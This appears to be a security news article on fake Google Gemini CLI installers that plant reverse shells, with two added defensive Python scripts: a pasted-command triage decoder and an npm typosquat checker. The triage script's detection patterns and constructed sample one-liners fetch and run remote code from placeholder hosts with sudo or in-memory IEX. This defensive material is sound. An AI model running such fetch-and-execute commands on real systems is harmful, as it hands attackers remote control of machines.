Fake Google Gemini CLI Tools Install Remote Shells

NordVPN warns that attackers are using cloned sites, repositories and social posts to distribute fake Google Gemini CLI installers that drop reverse shells and hand over full remote control of Mac and Windows machines.

NordVPN researchers reported active campaigns impersonating the official Google Gemini command-line interface. Attackers create cloned websites, fake repositories and deceptive social posts offering an apparent early or unofficial version of the Gemini CLI. Instead of legitimate software, the downloads install reverse shells that open an unrestricted remote connection to the compromised device.

On macOS the scam uses a cloned Gemini CLI page that instructs users to paste a command into Terminal. The command is Base64-encoded, so the page shows an opaque string rather than the download URL; when decoded, it fetches a script from a remote server and runs it with the highest privileges available. With those privileges an operator can read, modify or delete files, install additional malware, or use the compromised Mac to reach corporate networks the device is connected to.

The Windows variant uses a PowerShell delivery that mimics an installer. A script with benign-looking variable names such as $Install='GeminiCLI' contacts a remote server and executes the returned code directly in memory. Because nothing is written to disk, antivirus tools that only scan files for known signatures have nothing to inspect; the decoded content is still visible to PowerShell script block logging and to AMSI, which is where behavioral detection has to look.
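Both deliveries above depend on the victim running something whose real behavior is not visible on the page: a Base64 blob piped into a decoder and a shell on macOS, or a PowerShell one-liner that fetches and evaluates code in memory on Windows. The script below is an added example, not code from the NordVPN report or from any campaign sample. It decodes those layers (including PowerShell's UTF-16LE `-EncodedCommand` form) and lists the fetch-and-execute indicators it finds, so a pasted command can be read before it is run. The indicator list and the three sample commands, including the `example.invalid` URLs, are constructed for this example; only the `$Install='GeminiCLI'` variable name comes from the report.

```python
import base64
import re

# Added example (not from the NordVPN report): decode and triage a command a web page
# asks you to paste, BEFORE running it. Indicator patterns and sample commands below
# are constructed for this example; the URLs are placeholders, not campaign infrastructure.
FETCH_EXEC = [
    (r"\b(curl|wget)\b", "downloads from a remote server"),
    (r"\|\s*(sudo\s+)?(ba|z)?sh\b", "pipes downloaded content straight into a shell"),
    (r"\bsudo\b", "asks for elevated (root) privileges"),
    (r"(?i)\b(iex|invoke-expression)\b", "PowerShell Invoke-Expression: runs text as code in memory"),
    (r"(?i)downloadstring|invoke-webrequest|\biwr\b", "PowerShell fetches content from a URL"),
    (r"(?i)frombase64string", "PowerShell decodes an embedded Base64 blob"),
    (r"(?i)-(nop|noprofile)\b|-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass",
     "PowerShell launched with profile/window/policy evasion flags"),
]

# `echo <b64> | base64 -d | sh` style (macOS/Linux) and `powershell -EncodedCommand <b64>`
# (UTF-16LE) style. Both hide the real command from a casual look at the page.
B64_PIPE = re.compile(r"""(?:echo|printf)\s+['"]?([A-Za-z0-9+/=]{16,})['"]?\s*\|\s*base64\s+(?:-d|--decode|-D)\b""")
ENC_CMD = re.compile(r"(?i)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def decode_layers(command: str) -> list[str]:
    """Return the pasted command followed by every Base64 layer it carries, decoded."""
    layers = [command]
    for m in B64_PIPE.finditer(command):
        try:
            layers.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:  # not valid Base64: skip it, the outer layer is still triaged
            pass
    for m in ENC_CMD.finditer(command):
        try:
            layers.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le", "replace"))
        except ValueError:
            pass
    return layers


def triage(command: str) -> dict:
    """Decode every layer and return the union of fetch-and-execute indicators found."""
    layers = decode_layers(command)
    findings = set()
    for layer in layers:
        for pattern, why in FETCH_EXEC:
            if re.search(pattern, layer):
                findings.add(why)
    return {"layers": layers, "findings": sorted(findings)}


# Constructed samples in the shape the article describes (placeholder URLs).
MAC_SAMPLE = "echo {} | base64 -d | bash".format(
    base64.b64encode(b"curl -fsSL http://example.invalid/install.sh | sudo bash").decode())
WIN_SAMPLE = ('powershell -nop -w hidden -c "$Install=\'GeminiCLI\'; '
              "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/' + $Install)\"")
WIN_ENCODED = "powershell -w hidden -EncodedCommand " + base64.b64encode(
    "IEX (iwr http://example.invalid/x).Content".encode("utf-16-le")).decode()

if __name__ == "__main__":
    for sample in (MAC_SAMPLE, WIN_SAMPLE, WIN_ENCODED):
        report = triage(sample)
        print("command :", sample[:80])
        for i, layer in enumerate(report["layers"][1:], 1):
            print(f"layer {i} :", layer)
        for why in report["findings"]:
            print("  !", why)
        print()
```

Run it with no arguments to triage the three constructed samples. Surface indicators are a triage aid, not a verdict: a decoded command that merely downloads a script still tells you nothing about what that script does, which is why the only safe answer is to install from the official repository rather than to paste anything from a web page.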

NordVPN’s team also identified a typosquatting attempt targeting the npm ecosystem. Attackers prepared package names such as gemini/cli and gemini-cli to mimic the official @google/gemini-cli package, taking advantage of developers who omit the organization scope (the @google/ prefix) when installing. At the time of analysis neither fake package had appeared in the npm registry, but the preparation suggests a near-term risk.
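The typosquatting risk comes down to a string comparison that developers skip when they type the short name. The checker below is an added example, not code from the NordVPN report: it parses the package arguments of an `npm install` line and flags the two shapes the report names, the unscoped `gemini-cli` and the slash form `gemini/cli`. The second one never reaches the registry at all, because npm treats a bare `user/repo` argument as a GitHub shorthand and would clone whatever repository sits at that path. The edit-distance and separator-normalisation heuristics, the threshold of 2, and the `@googIe` near-miss sample are assumptions made for this example.

```python
from __future__ import annotations

import re

# Added example (not from the NordVPN report): vet the package arguments of an
# `npm install` line before running it. OFFICIAL lists the real package the campaign
# impersonates; the lookalike names in the usage block are the ones the report named.
OFFICIAL = {"@google/gemini-cli"}


def parse_spec(spec: str) -> tuple[str | None, str, str]:
    """Split 'scope/name@version' into (scope, name, version); scope keeps its '@'."""
    scope = None
    if spec.startswith("@"):
        scope, _, spec = spec.partition("/")
    name, _, version = spec.partition("@")
    return scope, name, version


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance, used as a rough lookalike measure (assumption: <= 2 is close)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def squash(s: str) -> str:
    """Normalise for comparison: lowercase and drop separators (gemini_cli ~ gemini-cli)."""
    return re.sub(r"[^a-z0-9]", "", s.lower())


def classify(spec: str) -> tuple[str, str]:
    """Return (verdict, reason) for one package argument: ok | block | suspicious | unknown."""
    scope, name, _ = parse_spec(spec)
    full = f"{scope}/{name}" if scope else name
    if full in OFFICIAL:
        return "ok", f"{full} is the official package"
    if scope is None and "/" in name:
        # npm treats bare user/repo as a GitHub shorthand, not a registry package.
        return "block", f"{name} is a GitHub shorthand and would install from an arbitrary repository"
    for official in OFFICIAL:
        off_scope, off_name = official.split("/", 1)
        if scope is None and name == off_name:
            return "block", f"unscoped {name} is not {official}; the scope {off_scope} is missing"
        if squash(name) == squash(off_name) or levenshtein(full, official) <= 2:
            return "suspicious", f"{full} looks like {official} but is not it"
    return "unknown", f"{full} is not a known lookalike; still check the registry page and publisher"


def check_install(command: str) -> list[tuple[str, str, str]]:
    """Classify every non-flag argument after `npm install` / `npm i` / `npm add`."""
    parts = command.split()
    if len(parts) < 2 or parts[0] != "npm" or parts[1] not in ("install", "i", "add"):
        return []
    return [(p, *classify(p)) for p in parts[2:] if not p.startswith("-")]


if __name__ == "__main__":
    for line in ("npm install -g @google/gemini-cli",
                 "npm install -g gemini-cli",          # lookalike named in the report
                 "npm install gemini/cli",             # lookalike named in the report
                 "npm i @googIe/gemini-cli@1.0.0"):    # constructed near-miss scope
        for spec, verdict, reason in check_install(line):
            print(f"{verdict:10} {spec:28} {reason}")
```

The "block" verdicts are the cheap, certain ones: a missing scope or a slash without a leading `@` is always wrong for this package. The "suspicious" heuristics are deliberately loose and will produce false positives; they exist to make a human read the registry page, not to replace that step.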

NordVPN advised downloading the Gemini CLI only from the official Google repository and avoiding installers offered through unofficial sites, forum posts or social messages. The firm recommended never running terminal or PowerShell commands copied from a webpage unless you wrote them or can verify exactly what they do. Developers should verify full package names, including organization prefixes, before installing from registries.

The researchers urged the use of security software that includes behavioral detection rather than relying solely on file-based scanning, because fileless attacks are designed to bypass traditional antivirus products.

Domininkas Virbickas, product director at NordVPN, warned: “AI tools are generating huge interest right now, and attackers are moving fast to exploit that.” NordVPN’s report noted that the delivered payloads grant full remote access to a victim’s machine.

Google did not respond to requests for comment by the time of publication.
